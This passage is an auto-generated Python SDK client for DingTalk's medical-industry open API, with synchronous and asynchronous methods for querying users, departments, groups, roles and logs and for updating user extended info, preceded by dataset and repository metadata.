| 76.807692 | 1,335 | 0.736104 | 424 | 1,997 | 3.415094 | 0.091981 | 1.259669 | 1.845994 | 2.403315 | 0.729972 | 0.683011 | 0.648481 | 0.648481 | 0.648481 | 0.648481 | 0 | 0.344864 | 0.059089 | 1,997 | 25 | 1,336 | 79.88 | 0.425758 | 0.005008 | 0 | 0 | 0 | 0.055556 | 0.687154 | 0.655416 | 0 | 1 | 0 | 0 | 0.333333 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.222222 | 0.222222 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
29b9dfcbaf8646c19101e3ef14362a7077a089d5 | 49,756 | py | Python | dingtalk/python/alibabacloud_dingtalk/industry_1_0/client.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | dingtalk/python/alibabacloud_dingtalk/industry_1_0/client.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | dingtalk/python/alibabacloud_dingtalk/industry_1_0/client.py | yndu13/dingtalk-sdk | 700fb7bb49c4d3167f84afc5fcb5e7aa5a09735f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_dingtalk.industry_1_0 import models as dingtalkindustry__1__0_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
def __init__(
self,
config: open_api_models.Config,
):
super().__init__(config)
self._endpoint_rule = ''
if UtilClient.empty(self._endpoint):
self._endpoint = 'api.dingtalk.com'
def query_user_info(
self,
user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryUserInfoHeaders()
return self.query_user_info_with_options(user_id, headers, runtime)
async def query_user_info_async(
self,
user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryUserInfoHeaders()
return await self.query_user_info_with_options_async(user_id, headers, runtime)
def query_user_info_with_options(
self,
user_id: str,
headers: dingtalkindustry__1__0_models.QueryUserInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserInfoResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryUserInfoResponse(),
self.do_roarequest('QueryUserInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}', 'json', req, runtime)
)
async def query_user_info_with_options_async(
self,
user_id: str,
headers: dingtalkindustry__1__0_models.QueryUserInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserInfoResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryUserInfoResponse(),
await self.do_roarequest_async('QueryUserInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}', 'json', req, runtime)
)
def query_all_member_by_dept(
self,
dept_id: str,
request: dingtalkindustry__1__0_models.QueryAllMemberByDeptRequest,
) -> dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllMemberByDeptHeaders()
return self.query_all_member_by_dept_with_options(dept_id, request, headers, runtime)
async def query_all_member_by_dept_async(
self,
dept_id: str,
request: dingtalkindustry__1__0_models.QueryAllMemberByDeptRequest,
) -> dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllMemberByDeptHeaders()
return await self.query_all_member_by_dept_with_options_async(dept_id, request, headers, runtime)
def query_all_member_by_dept_with_options(
self,
dept_id: str,
request: dingtalkindustry__1__0_models.QueryAllMemberByDeptRequest,
headers: dingtalkindustry__1__0_models.QueryAllMemberByDeptHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse(),
self.do_roarequest('QueryAllMemberByDept', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}/members', 'json', req, runtime)
)
async def query_all_member_by_dept_with_options_async(
self,
dept_id: str,
request: dingtalkindustry__1__0_models.QueryAllMemberByDeptRequest,
headers: dingtalkindustry__1__0_models.QueryAllMemberByDeptHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllMemberByDeptResponse(),
await self.do_roarequest_async('QueryAllMemberByDept', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}/members', 'json', req, runtime)
)
def query_all_member_by_group(
self,
group_id: str,
request: dingtalkindustry__1__0_models.QueryAllMemberByGroupRequest,
) -> dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllMemberByGroupHeaders()
return self.query_all_member_by_group_with_options(group_id, request, headers, runtime)
async def query_all_member_by_group_async(
self,
group_id: str,
request: dingtalkindustry__1__0_models.QueryAllMemberByGroupRequest,
) -> dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllMemberByGroupHeaders()
return await self.query_all_member_by_group_with_options_async(group_id, request, headers, runtime)
def query_all_member_by_group_with_options(
self,
group_id: str,
request: dingtalkindustry__1__0_models.QueryAllMemberByGroupRequest,
headers: dingtalkindustry__1__0_models.QueryAllMemberByGroupHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse(),
self.do_roarequest('QueryAllMemberByGroup', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups/{group_id}/members', 'json', req, runtime)
)
async def query_all_member_by_group_with_options_async(
self,
group_id: str,
request: dingtalkindustry__1__0_models.QueryAllMemberByGroupRequest,
headers: dingtalkindustry__1__0_models.QueryAllMemberByGroupHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllMemberByGroupResponse(),
await self.do_roarequest_async('QueryAllMemberByGroup', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups/{group_id}/members', 'json', req, runtime)
)
def query_user_roles(
self,
user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserRolesResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryUserRolesHeaders()
return self.query_user_roles_with_options(user_id, headers, runtime)
async def query_user_roles_async(
self,
user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserRolesResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryUserRolesHeaders()
return await self.query_user_roles_with_options_async(user_id, headers, runtime)
def query_user_roles_with_options(
self,
user_id: str,
headers: dingtalkindustry__1__0_models.QueryUserRolesHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserRolesResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryUserRolesResponse(),
self.do_roarequest('QueryUserRoles', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}/roles', 'json', req, runtime)
)
async def query_user_roles_with_options_async(
self,
user_id: str,
headers: dingtalkindustry__1__0_models.QueryUserRolesHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserRolesResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryUserRolesResponse(),
await self.do_roarequest_async('QueryUserRoles', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}/roles', 'json', req, runtime)
)
def query_all_group(
self,
request: dingtalkindustry__1__0_models.QueryAllGroupRequest,
) -> dingtalkindustry__1__0_models.QueryAllGroupResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllGroupHeaders()
return self.query_all_group_with_options(request, headers, runtime)
async def query_all_group_async(
self,
request: dingtalkindustry__1__0_models.QueryAllGroupRequest,
) -> dingtalkindustry__1__0_models.QueryAllGroupResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllGroupHeaders()
return await self.query_all_group_with_options_async(request, headers, runtime)
def query_all_group_with_options(
self,
request: dingtalkindustry__1__0_models.QueryAllGroupRequest,
headers: dingtalkindustry__1__0_models.QueryAllGroupHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllGroupResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllGroupResponse(),
self.do_roarequest('QueryAllGroup', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups', 'json', req, runtime)
)
async def query_all_group_with_options_async(
self,
request: dingtalkindustry__1__0_models.QueryAllGroupRequest,
headers: dingtalkindustry__1__0_models.QueryAllGroupHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllGroupResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllGroupResponse(),
await self.do_roarequest_async('QueryAllGroup', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups', 'json', req, runtime)
)
def query_all_groups_in_dept(
self,
dept_id: str,
request: dingtalkindustry__1__0_models.QueryAllGroupsInDeptRequest,
) -> dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllGroupsInDeptHeaders()
return self.query_all_groups_in_dept_with_options(dept_id, request, headers, runtime)
async def query_all_groups_in_dept_async(
self,
dept_id: str,
request: dingtalkindustry__1__0_models.QueryAllGroupsInDeptRequest,
) -> dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllGroupsInDeptHeaders()
return await self.query_all_groups_in_dept_with_options_async(dept_id, request, headers, runtime)
def query_all_groups_in_dept_with_options(
self,
dept_id: str,
request: dingtalkindustry__1__0_models.QueryAllGroupsInDeptRequest,
headers: dingtalkindustry__1__0_models.QueryAllGroupsInDeptHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse(),
self.do_roarequest('QueryAllGroupsInDept', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}/groups', 'json', req, runtime)
)
async def query_all_groups_in_dept_with_options_async(
self,
dept_id: str,
request: dingtalkindustry__1__0_models.QueryAllGroupsInDeptRequest,
headers: dingtalkindustry__1__0_models.QueryAllGroupsInDeptHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllGroupsInDeptResponse(),
await self.do_roarequest_async('QueryAllGroupsInDept', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}/groups', 'json', req, runtime)
)
def query_biz_opt_log(
self,
request: dingtalkindustry__1__0_models.QueryBizOptLogRequest,
) -> dingtalkindustry__1__0_models.QueryBizOptLogResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryBizOptLogHeaders()
return self.query_biz_opt_log_with_options(request, headers, runtime)
async def query_biz_opt_log_async(
self,
request: dingtalkindustry__1__0_models.QueryBizOptLogRequest,
) -> dingtalkindustry__1__0_models.QueryBizOptLogResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryBizOptLogHeaders()
return await self.query_biz_opt_log_with_options_async(request, headers, runtime)
def query_biz_opt_log_with_options(
self,
request: dingtalkindustry__1__0_models.QueryBizOptLogRequest,
headers: dingtalkindustry__1__0_models.QueryBizOptLogHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryBizOptLogResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.next_token):
query['nextToken'] = request.next_token
if not UtilClient.is_unset(request.max_results):
query['maxResults'] = request.max_results
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryBizOptLogResponse(),
self.do_roarequest('QueryBizOptLog', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/bizOptLogs', 'json', req, runtime)
)
async def query_biz_opt_log_with_options_async(
self,
request: dingtalkindustry__1__0_models.QueryBizOptLogRequest,
headers: dingtalkindustry__1__0_models.QueryBizOptLogHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryBizOptLogResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.next_token):
query['nextToken'] = request.next_token
if not UtilClient.is_unset(request.max_results):
query['maxResults'] = request.max_results
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryBizOptLogResponse(),
await self.do_roarequest_async('QueryBizOptLog', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/bizOptLogs', 'json', req, runtime)
)
def query_user_prob_code_dictionary(self) -> dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryHeaders()
return self.query_user_prob_code_dictionary_with_options(headers, runtime)
async def query_user_prob_code_dictionary_async(self) -> dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryHeaders()
return await self.query_user_prob_code_dictionary_with_options_async(headers, runtime)
def query_user_prob_code_dictionary_with_options(
self,
headers: dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse(),
self.do_roarequest('QueryUserProbCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/userProbCodes', 'json', req, runtime)
)
async def query_user_prob_code_dictionary_with_options_async(
self,
headers: dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryUserProbCodeDictionaryResponse(),
await self.do_roarequest_async('QueryUserProbCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/userProbCodes', 'json', req, runtime)
)
def query_job_status_code_dictionary(self) -> dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryHeaders()
return self.query_job_status_code_dictionary_with_options(headers, runtime)
async def query_job_status_code_dictionary_async(self) -> dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryHeaders()
return await self.query_job_status_code_dictionary_with_options_async(headers, runtime)
def query_job_status_code_dictionary_with_options(
self,
headers: dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse(),
self.do_roarequest('QueryJobStatusCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/jobStatusCodes', 'json', req, runtime)
)
async def query_job_status_code_dictionary_with_options_async(
self,
headers: dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryJobStatusCodeDictionaryResponse(),
await self.do_roarequest_async('QueryJobStatusCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/jobStatusCodes', 'json', req, runtime)
)
def query_department_info(
self,
dept_id: str,
) -> dingtalkindustry__1__0_models.QueryDepartmentInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryDepartmentInfoHeaders()
return self.query_department_info_with_options(dept_id, headers, runtime)
async def query_department_info_async(
self,
dept_id: str,
) -> dingtalkindustry__1__0_models.QueryDepartmentInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryDepartmentInfoHeaders()
return await self.query_department_info_with_options_async(dept_id, headers, runtime)
def query_department_info_with_options(
self,
dept_id: str,
headers: dingtalkindustry__1__0_models.QueryDepartmentInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryDepartmentInfoResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryDepartmentInfoResponse(),
self.do_roarequest('QueryDepartmentInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}', 'json', req, runtime)
)
async def query_department_info_with_options_async(
self,
dept_id: str,
headers: dingtalkindustry__1__0_models.QueryDepartmentInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryDepartmentInfoResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryDepartmentInfoResponse(),
await self.do_roarequest_async('QueryDepartmentInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}', 'json', req, runtime)
)
def update_user_extend_info(
self,
user_id: str,
request: dingtalkindustry__1__0_models.UpdateUserExtendInfoRequest,
) -> dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.UpdateUserExtendInfoHeaders()
return self.update_user_extend_info_with_options(user_id, request, headers, runtime)
async def update_user_extend_info_async(
self,
user_id: str,
request: dingtalkindustry__1__0_models.UpdateUserExtendInfoRequest,
) -> dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.UpdateUserExtendInfoHeaders()
return await self.update_user_extend_info_with_options_async(user_id, request, headers, runtime)
def update_user_extend_info_with_options(
self,
user_id: str,
request: dingtalkindustry__1__0_models.UpdateUserExtendInfoRequest,
headers: dingtalkindustry__1__0_models.UpdateUserExtendInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.job_code):
body['jobCode'] = request.job_code
if not UtilClient.is_unset(request.user_prob_code):
body['userProbCode'] = request.user_prob_code
if not UtilClient.is_unset(request.job_status_code):
body['jobStatusCode'] = request.job_status_code
if not UtilClient.is_unset(request.comments):
body['comments'] = request.comments
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse(),
self.do_roarequest('UpdateUserExtendInfo', 'industry_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/industry/medicals/users/{user_id}/extInfos', 'none', req, runtime)
)
async def update_user_extend_info_with_options_async(
self,
user_id: str,
request: dingtalkindustry__1__0_models.UpdateUserExtendInfoRequest,
headers: dingtalkindustry__1__0_models.UpdateUserExtendInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.job_code):
body['jobCode'] = request.job_code
if not UtilClient.is_unset(request.user_prob_code):
body['userProbCode'] = request.user_prob_code
if not UtilClient.is_unset(request.job_status_code):
body['jobStatusCode'] = request.job_status_code
if not UtilClient.is_unset(request.comments):
body['comments'] = request.comments
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse(),
await self.do_roarequest_async('UpdateUserExtendInfo', 'industry_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/industry/medicals/users/{user_id}/extInfos', 'none', req, runtime)
)
def query_all_doctors(
self,
request: dingtalkindustry__1__0_models.QueryAllDoctorsRequest,
) -> dingtalkindustry__1__0_models.QueryAllDoctorsResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllDoctorsHeaders()
